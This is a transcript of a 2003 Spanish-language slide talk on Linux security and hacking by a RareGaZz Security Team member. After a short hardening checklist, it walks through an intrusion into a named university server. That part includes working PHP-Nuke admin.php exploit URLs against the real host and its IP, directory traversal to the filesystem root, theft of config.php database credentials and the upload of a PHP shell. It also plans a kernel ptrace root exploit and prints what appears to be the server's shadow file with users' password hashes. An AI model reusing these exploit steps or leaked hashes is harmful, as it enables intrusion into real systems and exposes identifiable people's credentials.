Presentacion re y_des_09072003

SEGURIDAD Y HACKINGEN LINUX

Alonso Eduardo Caballero Quezada - ReYDeS -RareGaZz Security Team http://www.RareGaZz.orgSecurity Wari Projetcs http://www.SWP-zone.org

informatizate http://www.informatizate.net

Miércoles 9 de Julio del 2003

SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I

1. Seguridad

2. Seguridad en GNU/Linux

3. Hacking en Linux. (U.N.T)


1. Seguridad en GNU/Linux

Seguridad:

Seguridad es la característica de unsistema informático, que indica queese sistema está libre de todopeligro.

“La seguridad es un estado mental”


Que proteger?

. SoftWare

. HardWare

. Datos


De quien nos protegemos?

- Personas:

. Personal de la empresa . Ex-empleados . Curiosos . Hackers . Crackers . Terroristas (*) . Intrusos Remunerados

- Desastres Naturales:


- Amenazas Logicas:

. Software incorrecto . Herramientas de seguridad . Puertas traseras (Backdoor) . Bombas Logicas . Canales cubiertos . Virus . Gusanos . Caballos de Troya


SEGURIDAD EN LINUX


1. Definición de los servicios necesarios.

. Servidor Web (Apache) . Servidor de Correo (Sendmail) . Servidor SSH, FTP, DNS etc.


2. Utilizar Herramientas de Bastionado. (BASTILLE ó TITAN)

. Educa al administrador sobre potenciales problemas de seguridad en el sistema.


3. Utilizar un Antivirus basado en Software Libre. (AmaViS)

. Indicado cuando hay interacción entre Linux u otro sistema Operativo.


4. Utilización de un PROXY (SQUID).

. Un punto de acceso entre una intranet y una internet.

. Control de los datos. (squidGuard)


5. Instalación y configuración de un Firewall. (IPTABLES).

. Un punto estratégico de vigilancia del sistema.

. Creación de reglas para las conecciones y servicios.


6. Detección de Instrusos basados en HOST. (Tripwire)

. Comprobar la integridad de los archivos en el sistema.


7. Sistema Detector de Intrusos (IDS)

. Vigilancia del Servidor. . Detección de actividad sospechosa. . Respuesta mediata e inmediata

. Uso de (ACID) Consola de D.I


8. Administrador . Persona adecuada.

. Experiencia. (*)

. Actualización constante.


HACKING EN LINUX


ADVERTENCIA:

El artículo completo y detallado de lo expuesto a continuación sera publicado en la eZine RareGaZz Número 20. http://www.RareGaZz.org

Todo esta información se expone solo con finesdidacticos y de conocimiento. De ninguna manera el autor o el Grupo RareGaZz induce a realizar este tipo de acciones.

ReYDeS / RareGaZz Security Team


Institución:

Universidad Nacional de Trujillo

URL:

http://www.unitru.edu.pe

Tiempo Total:

2 horas.

Objetivo:

Auditoria Personal y Libre de la Seguridad del servidor de la Universidad Nacional de Trujillo


Primer Punto:

Obtener todo la informacion posible delsistema.

- Tools

. NMAP (www.insecure.org/nmap) . NIKTO (http://www.cirt.net/code/nikto.shtml) . NetCat . Comandos propios de Linux, desde un simple ping a un dig por ejemplo.

- Software De Auditoria:

. NESSUS (http://www.nessus.org)


NMAP


Nessus


Sistemas Vulnerables: PHPNuke 5.2 y anteriores

Sistemas Inmunes: PHPNuke 5.0 RC1

Exploit: Probando el formato de la siguiente URL:http://www.example.net/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txt

Mediante la anterior peticion de la anterior URL se podríaobserver leer en “config.php”. El cual contiene las claves de laBase de Datos. Con todas las posibles consecuencias que elloacarrea.


PHP NUKE EXPLOIT


Lo anterior, permite automatizar el test sobre la falla en “admin.php”

La URL que se analiza es la siguiente:

http://www.unitru.edu.pe/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

Con esto se copia “hacked.txt” al directorio “images”. Pero nos lleva al menu administracióncon el siguiente error:

Warning: Unable to create '/www/htdocs/images/hacked.txt’: Permission denied in /www/htdocs/admin.php on line 400


Ahora la siguiente URL, nos permite listar cualquier directorio de la web. En éste caso “/images/admin/”

http://www.unitru.edu.pe/admin.php?upload=1&wdir=/images/admin/

Solo directorios de la WEB?... NO!

http://200.60.44.6/admin.php?upload=1&wdir=/../../../

La Raiz del sistema (Formato texto)

bin bin 4k 22-03-2001 18:56:22 boot boot 1k 23-03-2001 07:20:08 etc etc 4k 12-03-2003 09:04:18 root root 4k 22-02-2003 10:25:13 ...


Se puede listar cualquier directorio y verarchivos, pero solo con permisos de nobody.

Que se necesita para elevar privilegios?.

. Acceso de escritura a un directorio.

. Copiar el config.php. Archivo de la configuración del phpnuke.

. Obtener mas información del sistema. Pero ahora desde dentro, por ejemplo Software instalado, versiones, actualizaciones, conecciones, etc.


. Problema: Tenemos el directorio /tmp/ para escritura, pero no podemos visualizar el archivo. Ya que estamos trabajando vía web.

. Solución: Encontramos el programa YaBB http://aries.unitru.edu.pe/foro/install.php

. Se tiene derechos de escritura en /foro/ y podemos visualizarlo vía web. Con lo cual:

http://200.60.44.6/admin.php?upload=1&file=config.php&file_name=p.txt&wdir=/foro/&userfile=config.php&userfile_name=p.txt

[DIR] Parent Directory 24-Feb-2003 23:47 - [ ] install.php 18-Feb-2003 03:08 18k [TXT] p.txt 18-Mar-2003 01:11 11k [ ] yse150.ya 18-Feb-2003 03:09 1.8M


PHP Nuke xploit: Permite subir archivos alsistema.


Con la ayuda de PHP-Nuke exploit para subirarchivos y el PHP Shell para ejecutar comandosya se tiene un mejor control sobte el sistema.


. En /foro/:

. Subir cmd.html, rs.php Y en nuestro localhost utilizamos el phpnuker.html.

Problema: Obtener privilegios ROOT.

Solución: Ejecutar un exploit para “explotar” una falla en el sistema. Por ejemplo. Versión del Kernel?

uname -a Linux aries 2.4.2 #2 Fri Mar 23 06:53:47 PET 2001 i686 unknown


Linux kmod/ptrace bug:

Cuando un proceso hace una petición a unacaracteristica que esta en un modulo. En kernelcrea un proceso hijo setea los permisos EUID GUID a 0 y llama a la funcion execve (“/sbin/mdprobe”)

El problema es que antes de que el EUID cambie el proceso hijo puede ser añadido con ptrace. De ésta manera el usuario puede insertar codigo dentro del proceso lo cual se ejecutará con privilegios de superusuario (ROOT).

Ejemplo: ->


root:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::gdm:*:9797:0:::::nobody:*:9797:0:::::dwong:$1$3NZyPSF2$2VO7nReTKGN5Y9PftBX1j/:12122:0:99999:7:::mysql:$1$2DIuivNW$5/35UzOTWcOdaPvqRFcuX.:11404:0:99999:7:::webmaster:$1$qcRvrUzR$U9Y5LepV0STQewAdD6FkA/:11624:0:99999:7:::toor:$1$12/Juu6R$riwwt6ZQcX4fKyynY3eZq1:11438:0:99999:7:::jchong:$1$DE/x6fuY$OWWC0qFyQMm7d9XdbG5f1/:11871:0:99999:7:::kayluss:$1$dWpxKneU$plRq15DL8/qtO9Z8414yW0:11914:0:99999:7:::eponte:$1$0hXuyKVe$Qxbdcg/erYBLpPkHNodC0.:12107:0:99999:7:::


Gracias por su atención

[root@camaratru root]# shutdown -r now

e-mail: [email protected]


Agradecimientos:

Mi Madre, mi hermana, mi sobrino y Padre.Angel Protector, alt3kx, Buanzo, PaTa, ocsic, Shadown,enan0, v1k1ng0, MaGics, Yo_soy, runl3v3l, xDAWN, Rebel, Neoy2k, RareTrip, GuyBrush, y0ni, y a todos los que alguna vez participaron en RareGaZz Security Team.A sicario, incompatible, xyz4a3, Sudmaster, y a todo los amigos de Security Wari Projects.A todos mis amigos virtuales del “Underground”.A Miguel, David, Deus, Francisco, Victor, Robert y Juan Manuel, del grupo informatizate.A Arturo, Alejandro, Javier, Juan, miembros de ICIAT.A todos mis amigos “reales”.A Juditsa, Claudia, Paola, Betsy, Cecilia, Carol, Miluska, Marilyn, Patricia, Silvana, Sara, Angela, Leily, Maribel, Cynthia, Elizabeth, Milagros, Erika, Jhenice, Nathaly, etc, etc. En especial a mi: Futura Esposa. (Donde quiera que este)


Problemas de identidad

* Me he olvidado el pasword.... * Me he olvidado mi login.... * ( variante de la anterior ) Es que no sé quien soy.... * Es que soy tonto, y necesito que me lo hagan.... * ¿Cuál es mi "dolarjome"?

Aspirantes a hacker

* ¿Qué tengo que hacer para entrar de root? * ¿Cómo puedo saltarme el firewall? * Oye, no me deja cambiar la configuración de las X... * Es que quiero poner un sniffer, y necesito entrar de root... * Qué hay que hacer en el firewall para que funcione la VozIP?

Presentacion re y_des_09072003

Technology

Transcript of Presentacion re y_des_09072003